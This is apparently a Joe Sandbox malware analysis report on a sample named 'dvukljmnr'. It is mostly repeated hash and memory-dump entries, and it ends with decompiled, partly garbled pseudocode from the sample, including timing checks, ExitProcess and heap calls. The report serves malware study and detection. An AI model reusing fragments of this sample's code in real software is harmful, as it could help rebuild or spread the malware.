                                                          • Associated: 00000006.00000002.984283870.0000000000AE7000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984289521.0000000000AF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984326505.0000000000B50000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_9e0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                                          • Instruction ID: 41e4343c146f66e2bb318e135f4e172b2897deff735033a37a94e91f6413aa4b
                                                          • Opcode Fuzzy Hash: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                                          • Instruction Fuzzy Hash: DBB012B2100540C7E3099714D946B4B7210FB90F00F40C93BA11B81861DB3C993CD46A
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 009FF9F0 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.984109714.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: true
                                                          • Associated: 00000006.00000002.984102532.00000000009E0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984259252.0000000000AD0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984268876.0000000000AE0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984275697.0000000000AE4000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984283870.0000000000AE7000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984289521.0000000000AF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984326505.0000000000B50000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_9e0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                          • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                                                          • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                          • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 009FF900 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.984109714.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: true
                                                          • Associated: 00000006.00000002.984102532.00000000009E0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984259252.0000000000AD0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984268876.0000000000AE0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984275697.0000000000AE4000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984283870.0000000000AE7000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984289521.0000000000AF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984326505.0000000000B50000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_9e0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                          • Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
                                                          • Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                          • Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 009FFAD0 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.984109714.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: true
                                                          • Associated: 00000006.00000002.984102532.00000000009E0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984259252.0000000000AD0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984268876.0000000000AE0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984275697.0000000000AE4000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984283870.0000000000AE7000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984289521.0000000000AF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984326505.0000000000B50000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_9e0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                          • Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
                                                          • Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                          • Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 009FFAE8 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.984109714.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: true
                                                          • Associated: 00000006.00000002.984102532.00000000009E0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984259252.0000000000AD0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984268876.0000000000AE0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984275697.0000000000AE4000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984283870.0000000000AE7000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984289521.0000000000AF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984326505.0000000000B50000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_9e0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                          • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                                                          • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                          • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 009FFBB8 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.984109714.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: true
                                                          • Associated: 00000006.00000002.984102532.00000000009E0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984259252.0000000000AD0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984268876.0000000000AE0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984275697.0000000000AE4000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984283870.0000000000AE7000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984289521.0000000000AF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984326505.0000000000B50000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_9e0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                          • Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
                                                          • Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                          • Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 009FFB68 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.984109714.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: true
                                                          • Associated: 00000006.00000002.984102532.00000000009E0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984259252.0000000000AD0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984268876.0000000000AE0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984275697.0000000000AE4000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984283870.0000000000AE7000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984289521.0000000000AF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984326505.0000000000B50000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_9e0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                          • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                                                          • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                          • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 009FFC90 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.984109714.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: true
                                                          • Associated: 00000006.00000002.984102532.00000000009E0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984259252.0000000000AD0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984268876.0000000000AE0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984275697.0000000000AE4000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984283870.0000000000AE7000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984289521.0000000000AF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984326505.0000000000B50000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_9e0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                                          • Instruction ID: 41c45e5f09b42d6e0ddb2dc3248e04f5cc5ab51982cd1fe1d329002f24c15819
                                                          • Opcode Fuzzy Hash: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                                          • Instruction Fuzzy Hash: 14B01272104580C7E349AB14D90AB5BB210FB90F00F40893AE04B81850DA3C992CC546
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 009FFC60 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.984109714.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: true
                                                          • Associated: 00000006.00000002.984102532.00000000009E0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984259252.0000000000AD0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984268876.0000000000AE0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984275697.0000000000AE4000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984283870.0000000000AE7000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984289521.0000000000AF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984326505.0000000000B50000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_9e0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                          • Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
                                                          • Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                          • Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 009FFD8C Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.984109714.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: true
                                                          • Associated: 00000006.00000002.984102532.00000000009E0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984259252.0000000000AD0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984268876.0000000000AE0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984275697.0000000000AE4000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984283870.0000000000AE7000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984289521.0000000000AF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984326505.0000000000B50000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_9e0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                          • Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
                                                          • Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                          • Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 009FFDC0 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.984109714.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: true
                                                          • Associated: 00000006.00000002.984102532.00000000009E0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984259252.0000000000AD0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984268876.0000000000AE0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984275697.0000000000AE4000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984283870.0000000000AE7000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984289521.0000000000AF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984326505.0000000000B50000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_9e0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                          • Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
                                                          • Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                          • Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 009FFEA0 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.984109714.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: true
                                                          • Associated: 00000006.00000002.984102532.00000000009E0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984259252.0000000000AD0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984268876.0000000000AE0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984275697.0000000000AE4000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984283870.0000000000AE7000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984289521.0000000000AF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984326505.0000000000B50000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_9e0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                                          • Instruction ID: c5322eb374cbfb3adeb08d178b54e1ae74a7d58a0408861c097d1ba4bd942992
                                                          • Opcode Fuzzy Hash: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                                          • Instruction Fuzzy Hash: 0DB01272200640C7F31A9714D906F4B7210FB80F00F00893AA007C19A1DB389A2CD556
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 009FFED0 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.984109714.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: true
                                                          • Associated: 00000006.00000002.984102532.00000000009E0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984259252.0000000000AD0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984268876.0000000000AE0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984275697.0000000000AE4000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984283870.0000000000AE7000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984289521.0000000000AF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984326505.0000000000B50000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_9e0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                          • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                                                          • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                          • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 009FFFB4 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.984109714.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: true
                                                          • Associated: 00000006.00000002.984102532.00000000009E0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984259252.0000000000AD0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984268876.0000000000AE0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984275697.0000000000AE4000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984283870.0000000000AE7000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984289521.0000000000AF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984326505.0000000000B50000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_9e0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                          • Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
                                                          • Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                          • Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00409AA0 Relevance: .1, Instructions: 92COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 93%
                                                          			E00409AA0(intOrPtr* _a4) {
				intOrPtr _v8;
				char _v24;
				char _v284;
				char _v804;
				char _v840;
				void* _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t39;
				void* _t50;
				intOrPtr* _t52;
				void* _t53;
				void* _t54;
				void* _t55;
				void* _t56;

				_t52 = _a4;
				_t39 = 0; // executed
				_t24 = E00407EA0(_t52,  &_v24); // executed
				_t54 = _t53 + 8;
				if(_t24 != 0) {
					E004080B0( &_v24,  &_v840);
					_t55 = _t54 + 8;
					do {
						E0041BE00( &_v284, 0x104);
						E0041C470( &_v284,  &_v804);
						_t56 = _t55 + 0x10;
						_t50 = 0x4f;
						while(1) {
							_t31 = E00414DE0(E00414D80(_t52, _t50),  &_v284);
							_t56 = _t56 + 0x10;
							if(_t31 != 0) {
								break;
							}
							_t50 = _t50 + 1;
							if(_t50 <= 0x62) {
								continue;
							} else {
							}
							goto L8;
						}
						_t9 = _t52 + 0x14; // 0xffffe055
						 *(_t52 + 0x474) =  *(_t52 + 0x474) ^  *_t9;
						_t39 = 1;
						L8:
						_t33 = E004080E0( &_v24,  &_v840);
						_t55 = _t56 + 8;
					} while (_t33 != 0 && _t39 == 0);
					_t34 = E00408160(_t52,  &_v24); // executed
					if(_t39 == 0) {
						asm("rdtsc");
						asm("rdtsc");
						_v8 = _t34 - 0 + _t34;
						 *((intOrPtr*)(_t52 + 0x55c)) =  *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;
					}
					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
					_t20 = _t52 + 0x31; // 0x5608758b
					 *((intOrPtr*)(_t52 + 0x32)) =  *((intOrPtr*)(_t52 + 0x32)) +  *_t20 + 1;
					return 1;
				} else {
					return _t24;
				}
			}



















                                                          0x00409aab
                                                          0x00409ab3
                                                          0x00409ab5
                                                          0x00409aba
                                                          0x00409abf
                                                          0x00409ad2
                                                          0x00409ad7
                                                          0x00409ae0
                                                          0x00409aec
                                                          0x00409aff
                                                          0x00409b04
                                                          0x00409b07
                                                          0x00409b10
                                                          0x00409b22
                                                          0x00409b27
                                                          0x00409b2c
                                                          0x00000000
                                                          0x00000000
                                                          0x00409b2e
                                                          0x00409b32
                                                          0x00000000
                                                          0x00000000
                                                          0x00409b34
                                                          0x00000000
                                                          0x00409b32
                                                          0x00409b36
                                                          0x00409b39
                                                          0x00409b3f
                                                          0x00409b41
                                                          0x00409b4c
                                                          0x00409b51
                                                          0x00409b54
                                                          0x00409b61
                                                          0x00409b6c
                                                          0x00409b6e
                                                          0x00409b74
                                                          0x00409b78
                                                          0x00409b7b
                                                          0x00409b7b
                                                          0x00409b82
                                                          0x00409b85
                                                          0x00409b8a
                                                          0x00409b97
                                                          0x00409ac6
                                                          0x00409ac6
                                                          0x00409ac6

                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.983955390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_400000_dvukljmnr.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9835c872434805b420af9e009800db09fa022f69ef5fa6a2d6e4e63ee433b124
                                                          • Instruction ID: 290ea537485be02d779a264d5a339eceb4dab98af215cfaa17b5abd8430697b8
                                                          • Opcode Fuzzy Hash: 9835c872434805b420af9e009800db09fa022f69ef5fa6a2d6e4e63ee433b124
                                                          • Instruction Fuzzy Hash: FD213AB2D442095BCB21D664AD42BFF73BCAB54314F04007FE949A3182F638BF498BA5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0041A692 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38memoryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          C-Code - Quality: 18%
                                                          			E0041A692(void* __ebx, void* __eflags, intOrPtr _a4, int _a8, char _a12, long _a16, long _a20) {
				intOrPtr* __esi;
				void* __ebp;
				void* _t18;
				void* _t20;
				void* _t22;
				void* _t25;
				void* _t26;

				asm("in al, 0xf0");
				asm("adc cl, [ebx+0x6f]");
				if(__eflags <= 0) {
					__eflags =  *(__ebx + 0x55557d72) * 0xffffff8b;
					__ebp = __esp;
					__esi = _a4 + 0xc7c;
					ExitProcess(_a8);
				}
				 *((intOrPtr*)(_t20 - 0x73)) =  *((intOrPtr*)(_t20 - 0x73)) + _t22;
				 *((intOrPtr*)(_t26 + 0x50)) =  *((intOrPtr*)(_t26 + 0x50)) + _t22;
				E0041AF50(_t25);
				_t7 =  &_a12; // 0x414526
				_t18 = RtlAllocateHeap( *_t7, _a16, _a20); // executed
				return _t18;
